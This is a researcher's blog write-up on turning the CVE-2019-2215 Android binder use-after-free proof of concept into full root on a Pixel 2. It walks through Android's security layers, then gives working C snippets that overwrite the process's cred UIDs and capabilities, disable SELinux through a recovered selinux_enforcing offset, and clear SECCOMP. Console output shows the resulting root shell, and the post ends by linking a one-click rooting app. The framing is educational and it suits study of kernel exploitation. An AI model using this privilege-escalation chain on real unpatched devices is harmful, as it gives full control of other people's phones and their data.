Tailoring CVE-2019-2215 to Achieve Root

When I heard about the emergency disclosure of CVE-2019-2215 by Project Zero, I decided to replicate the exploit on my local device to see it in action. I so happened to have a vulnerable Pixel 2 with the exact kernel version as my main device (don’t hack me). All I needed to do was compile the exploit and run it over ADB. I downloaded the latest Android NDK and compiled the proof of concept:

[grant ~/Downloads/android-ndk-r20 >> ./toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang -o poc ../poc.c
[grant ~/Downloads/android-ndk-r20 >> adb push poc /data/local/tmp/poc
poc: 1 file pushed. 0.8 MB/s (22528 bytes in 0.026s)

I ran it on my device and confirmed that I was able to reproduce Maddie Stone’s screenshot exactly.

The base PoC left us with a full kernel read/write primitive, essentially game over for the systems’ security, but left achieving root as an exercise for the reader. This raises the question, what does “root” really mean for a modern Android system? To answer this, we must first understand how Android enforces its security policies.

Android protects against malicious applications through a layered enforcement approach. Here are the major players:

Android Security Hierarchy

Discretionary Access Control (DAC) - UNIX permissions (user/group IDs, R/W/X object permissions
Mandatory Access Control (MAC) - Type enforcement through SELinux/SEAndroid (effectively a whitelist of who can talk to who and how)
Linux Capabilities (CAP) - Breaks up the all-powerful root user into permission slices (CAP_XYZ)
SECCOMP - Allows system calls to be filtered/blocked, effectively limiting the kernel attack surface
Android Middleware - Typical Android app permissions as defined in android_manifest.xml such as android.permission.INTERNET (usually enforced by system_server)

To get a full root shell we’d need to bypass each layer of enforcement (with the exception of the Android middleware as the exploit targets binder, which doesn’t require any middleware checks to access). On a modern Android system, this is a significant undertaking without a kernel vulnerability. But with an app accessible kernel exploit, we have the ability to bypass or disable all of these with relative ease. For each task on a system, the Linux kernel keeps track of its state in the task_struct structure. This state happens to include security relevant details such as all of the user IDs, its SELinux context, what capabilities it has, if SECCOMP is enabled, and many others. If we are able to target a specific task_struct with our R/W primitive, we will be able to change these security sensitive values to what we please. For instance, if we target our own task (the current process), then we can effectively achieve an Escalation of Privilege (EoP).

Escalating to Root

Bypassing DAC and CAP

With a pointer to our current task_struct, all we need is the correct offset from the start to our current process credentials. We can then read the pointer value and use it in subsequent calls to poke at our credentials.

The cred struct in Linux has all of the goodies we’re looking to change to escalate our current process. Here is the source code taken from the latest version of the Linux kernel.

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key	*session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
} __randomize_layout;

There are a lot of fields of varying sizes that we need to change. Before randomly poking what we believe to be the right offsets, lets dump the memory of our credential struct to eyeball it.

[grant ~/Downloads/android-ndk-r20 >> adb shell /data/local/tmp/poc shell
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffea05065700
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffea05065700
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffeaafefc100
current->mm->user_ns == 0xffffff98848af2c8
kernel base is 0xffffff9882880000
&init_task == 0xffffff98848a57d0
init_task.cred == 0xffffff98848b0b08
init->cred
00000000  04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00  |....?.......?...|
00000040  ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00  |....?...........|
00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 80 d4 42 b9 ea ff ff ff  |..........B.....|
00000080  c8 f3 8a 84 98 ff ff ff c8 f2 8a 84 98 ff ff ff  |................|
00000090  78 0a 8b 84 98 ff ff ff 00 00 00 00 00 00 00 00  |x...............|
current->cred == 0xffffffeab30a5b40
Starting as uid 2000
current->cred
00000000  1a 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000010  d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000020  d0 07 00 00 2f 00 00 00 00 00 00 00 00 00 00 00  |..../...........|
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000040  c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000050  00 00 00 00 00 00 00 00 c0 b6 9d f2 c3 ff ff ff  |........@..2....|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 00 29 ce 69 c4 ff ff ff  |................|
00000080  00 50 22 74 c4 ff ff ff c8 f2 aa 14 9e ff ff ff  |...1............|
00000090  00 33 fa 9e c3 ff ff ff 00 00 00 00 00 00 00 00  |................|

Looking at the bottom hexdump, we can start to see some patterns. Our current UID, 2000, in hex is 0x07d0. We can easily see that we definitely have a correct pointer to our task’s credential struct in the manually reformatted hexdump below:

~~~ Dump of current->cred ~~~
OFF | VALUE
 0  | 1a000000 // usage
 4  | d0070000 // uid
 8  | d0070000 // gid
 c  | d0070000 // suid
10  | d0070000 // sgid
14  | d0070000 // euid
18  | d0070000 // egid
1c  | d0070000 // fsuid
20  | d0070000 // fsgid
24  | 2f000000 // securebits
28  | 0000000000000000 // cap inh
30  | 0000000000000000 // cap perm
38  | 0000000000000000 // cap eff
40  | c000000000000000 // cap bound
48  | 0000000000000000 // cap ambient
50  | 0000000000000000 // jit keyring
58  | c0b69df2c3ffffff // session keyring
60  | 0000000000000000 // process keyring
68  | 0000000000000000 // thread keyring
70  | 0000000000000000 // request key auth
78  | 0029ce69c4ffffff // cred->security
80  | 00502274c4ffffff // user struct
88  | c8f2aa149effffff // user namespace
90  | 0033fa9ec3ffffff // group info

With this map, we can begin to become root, first by setting all of our uid and gids to 0.

uid_t uid = getuid();
unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);

printf("current->cred == 0x%lx\n", my_cred);

printf("Starting as uid %u\n", uid);
printf("Escalating...\n");

// change IDs to root (there are eight)
for (int i = 0; i < 8; i++)
  kernel_write_uint(my_cred+4 + i*4, 0);

if (getuid() != 0) {
  printf("Something went wrong changing our UID to root!\n");
  exit(1);
}

printf("UIDs changed to root!\n");

Executing a shell from this point, demonstrates that we have root…but only the DAC part of it.

...
UIDs changed to root!
Spawning shell!
id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0

Next, we target capabilities. This involves setting every capability bit to 1 and clearing our securebits (init doesn’t have these set, so why should we).

// reset securebits
kernel_write_uint(my_cred+0x24, 0);

// change capabilities to everything (perm, effective, bounding)
for (int i = 0; i < 3; i++)
  kernel_write_ulong(my_cred+0x30 + i*8, 0x3fffffffffUL);

printf("Capabilities set to ALL\n");

Now our process is technically full root from a stock Linux perspective, but Android’s MAC policy still locks our root process to anything that the u:r:shell:s0 context can do.

Disabling SELinux

It is now time to take out the strictest security policy: SELinux. Lower down in the cred struct of our process we see the security opaque type at offset 0x78:

...
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
...

This is pointer to a struct task_security_struct allocated by the selinux_cred_alloc_blank function in security/selinux/hooks.c.

The definition of this struct is as follows:

struct task_security_struct {
	u32 osid;		/* SID prior to last execve */
	u32 sid;		/* current SID */
	u32 exec_sid;		/* exec SID */
	u32 create_sid;		/* fscreate SID */
	u32 keycreate_sid;	/* keycreate SID */
	u32 sockcreate_sid;	/* fscreate SID */
};

We are most interested in the sid field as this determines the active SELinux context of our process. Lets set this to another higher privileged SID, such kernel (SID = 1) or init (SID = 7) (initial SID list)!

unsigned long current_cred_security = kernel_read_ulong(my_cred+0x78);

// change SID to kernel
kernel_write_uint(current_cred_security + 4, 1);
printf("[+] SID -> kernel (1)\n");

The exploit works up until we change our SID at which point our ADB connection hangs. Why does this hang? Well, just changing the SID of a process connected and communicating to others, isn’t guaranteed to work. It depends on the SELinux policy for the target SID. Did it actually change the SID?

walleye:/ $ cat /proc/xxx/attr/current
u:r:kernel:s0

It did, but it looks like hoisting ourself directly from shell to kernel isn’t going to work. We need to take a different approach and disable SELinux outright. Disabling SELinux is a popular technique for Android kernel exploits and is achievable with a kernel R/W primitive. The only caveat is that need to know the offset from the kernel base of the selinux_enforcing symbol. If we happen to have a working kernel build tree in front of us, we can likely find this symbol using pahole as mentioned in the original PoC source. But what if we just have a kernel binary?

Recovering selinux_enforcing

I will detail the steps taken to recover this symbol for the Pixel 2 kernel 4.4.177-g83bee1dc48e8. Googling this string leads to a wahoo-kernel repo. From here we can download the Image.lz4-dtb file, which happens to match the kernel I’m running. Downloading this file, we have a compressed kernel image. Decompressing this gives us a vmlinux file:

[grant ~/Downloads >> lz4 -d Image.lz4-dtb Image
Decompressed : 34 MB  Stream followed by undecodable data at position 14571037
Image.lz4-dtb        : decoded 36238336 bytes
[grant ~/Downloads >> strings Image | grep "Linux version "
Linux version 4.4.177-g83bee1dc48e8 (android-build@abfarm-us-west1-c-0087) (Android (5484270 based on r353983c) clang version 9.0.3 (https://android.googlesource.com/toolchain/clang 745b335211bb9eadfa6aa6301f84715cee4b37c5) (https://android.googlesource.com/toolchain/llvm 60cf23e54e46c807513f7a36d0a7b777920b5881) (based on LLVM 9.0.3svn)) #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019

Now we need to dig into this and recover the kallsyms table. There is an excellent tool that does all of the complicated steps for you: https://github.com/nforest/droidimg. Cloning and installing the dependencies of droidimg, we run it on our decompressed image:

[grant ~/Downloads/droidimg >> ./vmlinux.py Image
Linux version 4.4.177-g83bee1dc48e8 (android-build@abfarm-us-west1-c-0087) (Android (5484270 based on r353983c) clang version 9.0.3 (https://android.googlesource.com/toolchain/clang 745b335211bb9eadfa6aa6301f84715cee4b37c5) (https://android.googlesource.com/toolchain/llvm 60cf23e54e46c807513f7a36d0a7b777920b5881) (based on LLVM 9.0.3svn)) #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019
[+]kallsyms_arch = arm64
[!]could be offset table...
[!]lookup_address_table error...
[!]get kallsyms error...

We get an error finding the kallsyms table. I suspect it has to do with KASLR given some notes in the README. I run a tool provided by droidimg to fixup the binary for further extraction:

[grant ~/Downloads/droidimg >> gcc -o fix_kaslr_arm64 fix_kaslr_arm64.c
fix_kaslr_arm64.c:265:5: warning: always_inline function might not be inlinable [-Wattributes]
 int main(int argc, char **argv)

[grant ~/Downloads/droidimg >> ./fix_kaslr_arm64 Image Image_kaslr
Original kernel: image_dec, output file: image_dec_kaslr
kern_buf @ 0x7f4105ea2000, mmap_size = 36241408
rela_start = 0xffffff80098d66d0
p->info = 0x0
rela_end = 0xffffff800a0810d8
335004 entries processed

Finally we’re able to get the symbol table:

[grant ~/Downloads/droidimg >> ./vmlinux.py Image_kaslr
Linux version 4.4.177-g83bee1dc48e8 ...
[+]kallsyms_arch = arm64
[+]numsyms: 131603
[+]kallsyms_address_table = 0x11acc00
[+]kallsyms_num = 131603 (131603)
[+]kallsyms_name_table = 0x12ade00
[+]kallsyms_type_table = 0x0
[+]kallsyms_marker_table = 0x1469900
[+]kallsyms_token_table = 0x146aa00
[+]kallsyms_token_index_table = 0x146ae00
[+]kallsyms_start_address = 0xffffff8008080000L
[+]found 9915 symbols in ksymtab
ffffff8008080000 t _head
ffffff8008080000 T _text
...

Scanning through the output symbols, no selinux_enforcing is found! Reading the source code of droidimg shows that it has a special mode that uses Miasm to recover unexported symbols, namely selinux_enforcing. Re-running with Miasm support coughs up our symbol: ffffff800a44e4a8 B selinux_enforcing. Subtracting ffffff8008080000 t _head from this gives us an offset of 0x23ce4a8.

Finally, we are able to disable SELinux in our exploit:

#define SYMBOL__selinux_enforcing 0x23ce4a8

unsigned int enforcing = kernel_read_uint(kernel_base + SYMBOL__selinux_enforcing);

printf("SELinux status = %u\n", enforcing);

if (enforcing) {
  printf("Setting SELinux to permissive\n");
  kernel_write_uint(kernel_base + SYMBOL__selinux_enforcing, 0);
} else {
  printf("SELinux is already in permissive mode\n");
}

Disabling SECCOMP

When running my initial exploits over ADB, I wasn’t affected by any SECCOMP policies. When I bundled the exploit into an application, commands that worked before stopped doing so. For example, the mount command I was using to create a tmpfs for Magisk on /sbin was no longer mounting. SECCOMP was doing its job and limited the application and its children from being able to access any old syscall.

Like our task’s DAC, CAP, and MAC state, SECCOMP also lives in our task_struct as the seccomp inline struct:

struct seccomp {
	int mode;
	struct seccomp_filter *filter;
};

The mode can be either 0 (disabled), SECCOMP_MODE_STRICT, or SECCOMP_MODE_FILTER. SECCOMP is usually used in filter mode, where an eBPF program is created to be executed on each syscall, returning ALLOW or DENY, similar to firewall rules. This filter is pointed to by the filter parameter. To disable SECCOMP seems as simple as changing the mode to 0, but this just leads to a kernel crash. But why? Well, when SECCOMP is enabled, it also sets the TIF_SECCOMP flag in the task_struct->thread_info.flags struct, which is used by the initial syscall entry handlers to determine if any filtering needs to take place. Reseting the mode BEFORE reseting this flag leads to a kernel BUG() statement being called from the __secure_computing function. To disable SECCOMP outright, this flag is cleared. To prevent SECCOMP from being copied to child processes on fork() the mode then needs to be cleared (the filter too).

#define OFFSET__task_struct__thread_info__flags 0 // if CONFIG_THREAD_INFO_IN_TASK is defined

// Grant: SECCOMP isn't enabled when running the poc from ADB, only from app contexts
if (prctl(PR_GET_SECCOMP) != 0) {
  printf("Disabling SECCOMP\n");

  // clear the TIF_SECCOMP flag and everything else :P (feel free to modify this to just clear the single flag)
  // arch/arm64/include/asm/thread_info.h:#define TIF_SECCOMP 11
  kernel_write_ulong(current_ptr + OFFSET__task_struct__thread_info__flags, 0);
  kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa8, 0);
  kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa0, 0); // this offset was eyeballed

  if (prctl(PR_GET_SECCOMP) != 0) {
    printf("Failed to disable SECCOMP!\n");
    exit(1);
  } else {
    printf("SECCOMP disabled!\n");
  }
} else {
  printf("SECCOMP is already disabled!\n");
}

Finally, with SECCOMP disabled, we have achieved a full root shell:

walleye:/ $ /data/local/tmp/poc
usage: /data/local/tmp/poc [shell|shell_exec]
/data/local/tmp/poc shell - spawns an interactive shell
/data/local/tmp/poc shell_exec "command" - runs the provided command in an escalated shell
1|walleye:/ $ /data/local/tmp/poc shell
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffeaa7e86580
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffeab3991040
current->mm->user_ns == 0xffffff98848af2c8
kernel base is 0xffffff9882880000
current->cred == 0xffffffeaa0223540
Starting as uid 2000
Escalating...
UIDs changed to root!
Capabilities set to ALL
SELinux status = 1
Setting SELinux to permissive
Re-joining the init mount namespace...
Re-joining the init net namespace...
SECCOMP disabled!
Spawning shell!
:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
:/ # getenforce
Permissive

If this kind of exploitation excites you and you want to learn more or practice, there are some very good Linux kernel exploitation CTF problems that I’d recommend you try: Brad Oderberg, suckerusu, StringIPC, and pwnable.kr (Rootkiss/syscall) (plus many more I’m leaving out). Andrey K. has an index of Linux kernel exploitation techniques and talks that you should also check out.

Qu1ckR00t

Once I had a reliable working exploit that I could use over ADB, I decided it would be neat to see the exploit working from an application context. I created Qu1ckR00t (the name is satire) as a one-click rooting application that also YOLO-installs™ Magisk.

Qu1ckR00t is a PROOF OF CONCEPT. It should NOT be used on your personal device with valuable userdata. It has only been tested on a Pixel 2. Running it on any other device / kernel will likely lead to a crash or even data loss. DO NOT install extra Magisk environment files or upgrade Magisk if prompted as this will patch boot, breaking DM-Verity on next boot likely leading to data-loss when you need to reflash.

The bottom line is that Magisk was NEVER meant to be installed this way and you will really break things without further patches to Magisk itself. That being said, I did all my development on my personal device, but I am a so called “professional”.

There is nothing novel about Qu1ckR00t, but it is cool to get a little taste of a typical iOS jailbreaking flow on Android. Maybe in the future if OEMs like Samsung completely remove OEM Unlock, this kind of rooting method will return to popularity.

Without further ado – Qu1ckr00t source code: https://github.com/grant-h/qu1ckr00t

Rooting a Pixel 2 with Magisk from an untrusted app using CVE-2019-2215, no OEM unlock needed pic.twitter.com/yGovBluQj5
— Grant Hernandez (@Digital_Cold) October 9, 2019